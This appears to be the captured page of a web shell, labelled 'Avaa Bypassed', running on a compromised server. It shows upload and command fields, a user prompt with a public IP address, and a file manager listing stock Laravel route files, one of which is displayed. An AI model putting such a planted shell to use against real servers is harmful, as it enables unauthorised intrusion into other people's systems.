404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.141.200.103: ~ $
<?php

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| API Routes
|--------------------------------------------------------------------------
|
| Here is where you can register API routes for your application. These
| routes are loaded by the RouteServiceProvider and all of them will
| be assigned to the "api" middleware group. Make something great!
|
*/

Route::middleware('auth:sanctum')->get('/user', function (Request $request) {
    return $request->user();
});

Filemanager

Name Type Size Permission Actions
api.php File 570 B 0644
channels.php File 558 B 0644
console.php File 592 B 0644
web.php File 1.04 KB 0644